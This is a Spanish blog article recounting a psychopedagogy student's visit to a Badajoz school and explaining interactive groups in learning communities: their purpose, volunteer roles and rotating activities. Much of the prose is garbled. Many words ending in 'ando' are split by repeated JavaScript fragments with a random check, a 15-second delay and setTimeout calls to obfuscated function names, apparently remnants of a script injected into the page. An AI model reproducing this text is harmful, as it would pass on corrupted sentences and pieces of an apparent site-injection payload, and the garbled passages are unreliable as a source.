GRUPOS INTERACTIVOS EN COMUNIDADES DE APRENDIZAJE

Autora: Rocío Lobato Rodríguez

          Voy a contar mi reciente experiencia acerca de los grupos interactivos:

          Hace aproximadamente seis meses, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando yo cursaba mi último año de la Licenciatura de Psicopedagogía, una profesora nos propuso en su asignatura sustituir el examen final por un trabajo, cuyo tema era de libre elección y en el que teníamos que investigar y profundizar para exponerlo al resto de la clase en el día acordado.

          Decidimos elegir el tema de los grupos interactivos en comunidades de aprendizaje, porque siempre los profesores nos hablaban de que teníamos que cambiar la metodología tradicional en las aulas y  trabajar en comunidades de aprendizaje, pero no nos explicaban cómo debíamos hacerlo. Entonces, nos enteramos de que en un centro de Badajoz se realizaban, así que decidimos ir y ver cómo se llevaban a cabo.

          Pero, ¿qué son los grupos interactivos? Según Ramón Flecha y Lidia Puigvert:son una forma flexible de organizar el trabajo en el aula y su finalidad es intensificar el aprendizaje mediante interacciones entre iguales, para lograr un objetivo común entre los miembros del equipo”.

          Y, ¿por qué es necesario trabajar con grupos interactivos en las aulas de hoy en día? Las siguientes razones han sido obtenidas de la conclusión de nuestro trabajo:

  • Las aulas son cada vez más heterogéneas y diversas. Es necesario propiciar unas metodologías y una gestión de los recursos que aprovechen al máximo la riqueza de experiencias y de culturas que ofrece esta diversidad y que facilita los aprendizajes escolares.
  • Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando mejor aprendemos algo es cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando nos lo explica alguien que lo ha entendido muy recientemente, porque todavía recuerda las estrategias que ha utilizado.
  • Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando mejor entendemos un texto y más nos motiva es cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando lo comentamos con personas que también lo han leído. El aprendizaje dialógico pone el énfasis en potenciar las interacciones que fomenten ese diálogo reflexivo, tanto dentro como fuera del aula. Desde este enfoque, se han desarrollado los grupos interactivos: una metodología de aula para multiplicar las interacciones y acelerar los aprendizajes, que incluye la participación de más adultos en el aula, para dinamizar el trabajo del alumnado.

           El objetivo, por tanto, de los grupos interactivos es el aprendizaje constante del alumnado y que aprenda más de lo que suele aprender con los medios habituales. No se trata de separar al alumnado en función de sus dificultades, sino de potenciar los aprendizajes de todos dentro del aula: que quien más dificultades tenga pueda participar del trabajo de los demás, que quien acaba o ha entendido la actividad antes se la explique a otro.

           Pero, ¿quiénes se encuentran implicados en los grupos interactivos y qué tareas realizan? En estos grupos no solo se implican los alumnos y profesores, sino también otras personas voluntarias que acuden al centro cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando se llevan a cabo las comunidades de aprendizaje y que están, de algún modo, relacionadas con ellas: padres y madres, profesores (de otros centros, jubilados, etc.), estudiantes de magisterio o personas del mismo barrio. Las funciones de los voluntarios son:

-         Seguir con atención el desarrollo del trabajo de cada alumno/a.

-         Identificar las dificultades.

-         Fomentar a que lleguen a resolver las dificultades entre sí, multiplicandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el trabajo por hacer y enriqueciendo las interacciones.

-         Las dudas, sin embargo, serán resueltas por la tutora; los voluntarios no tienen por qué conocer el contenido que se está impartiendo.

           Las actividades que se desarrollan se llevan a cabo en cuatro grupos heterogéneos de 5 o 6 alumnos, donde se trabajan diferentes partes de una misma materia (esta suele ser siempre Matemáticas o Lengua) y, pasados 20 minutos, los alumnos se cambian de grupo y van realizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando todas las actividades.

          Después de todo lo vivido en esta experiencia, podía concluir diciendo que los grupos interactivos son subgrupos de trabajo formados por alumnos de un mismo grado escolar. Estos son seleccionados buscandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la heterogeneidad, sin importar, por tanto, su nivel de aprendizaje y origen cultural. No se saca a nadie del aula, ni del centro, sino que se dispone, dentro de la misma, de todos los recursos que necesitan.

          La finalidad de estos grupos (que se recomienda que sean asistidos por el profesor titular de la clase y personas voluntarias) es enriquecer el aprendizaje y complementar los conocimientos, basándose, para ello, en la diversidad y la ayuda mutua, intentandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando así que todos los niños aprendan y desaparezcan los problemas de fracaso y conflicto. Y, quizás, lo más enriquecedor es que las personas que entran en el aula no son sólo profesores, sino los propios familiares de los niños, profesorado jubilado, voluntariado, etcétera, es decir, tantas personas como sean necesarias para que nadie se quede rezagado en el aprendizaje y para que todos convivan desde pequeños de forma solidaria.

          Para reflexionar os dejo con una cita de Ramón Flecha: “Como profesionales de la educación debemos compartir ese sueño de igualdad, y que sea un proyecto mundial: que el aprendizaje que queremos para nuestros hijos e hijas esté al alcance de todos los niños y niñas”.


 

Bibliografía:

 

 

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